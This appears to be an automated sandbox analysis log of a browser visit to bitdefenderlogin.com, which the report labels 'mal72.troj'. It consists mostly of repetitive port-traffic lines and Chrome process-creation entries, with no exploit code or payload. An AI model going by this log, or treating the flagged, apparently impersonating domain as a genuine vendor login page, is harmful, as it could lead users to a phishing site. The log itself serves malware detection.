Source: unknownNetwork traffic detected: HTTP traffic on port 51192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 51077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50704
Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50705
Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51561 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50708
Source: unknownNetwork traffic detected: HTTP traffic on port 51446 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50707
Source: unknownNetwork traffic detected: HTTP traffic on port 51626 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50714
Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50716
Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50719
Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 50771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51573 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50727
Source: unknownNetwork traffic detected: HTTP traffic on port 51638 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50720
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
Source: unknownNetwork traffic detected: HTTP traffic on port 51396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51213
Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50779
Source: unknownNetwork traffic detected: HTTP traffic on port 50911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50778
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50772
Source: unknownNetwork traffic detected: HTTP traffic on port 51025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50774
Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50789
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50780
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50781
Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
Source: unknownNetwork traffic detected: HTTP traffic on port 51806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50786
Source: unknownNetwork traffic detected: HTTP traffic on port 51139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50785
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51498 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50798
Source: unknownNetwork traffic detected: HTTP traffic on port 51360 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50792
Source: unknownNetwork traffic detected: HTTP traffic on port 51245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50797
Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50796
Source: unknownNetwork traffic detected: HTTP traffic on port 51409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
Source: unknownNetwork traffic detected: HTTP traffic on port 51840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
Source: unknownNetwork traffic detected: HTTP traffic on port 51347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
Source: unknownNetwork traffic detected: HTTP traffic on port 51335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
Source: unknownNetwork traffic detected: HTTP traffic on port 51004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51139
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51133
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51141
Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51406 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51471 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51483 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51495 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 443
Source: unknownHTTPS traffic detected: 23.53.114.19:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.53.114.19:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.201.120.160:443 -> 192.168.2.5:51303 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.150.37.130:443 -> 192.168.2.5:51548 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.150.37.130:443 -> 192.168.2.5:51844 version: TLS 1.2
Source: classification engineClassification label: mal72.troj.win@28/1729@373/66
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,8097275639217116545,5346654218420662378,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.bitdefenderlogin.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,8097275639217116545,5346654218420662378,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
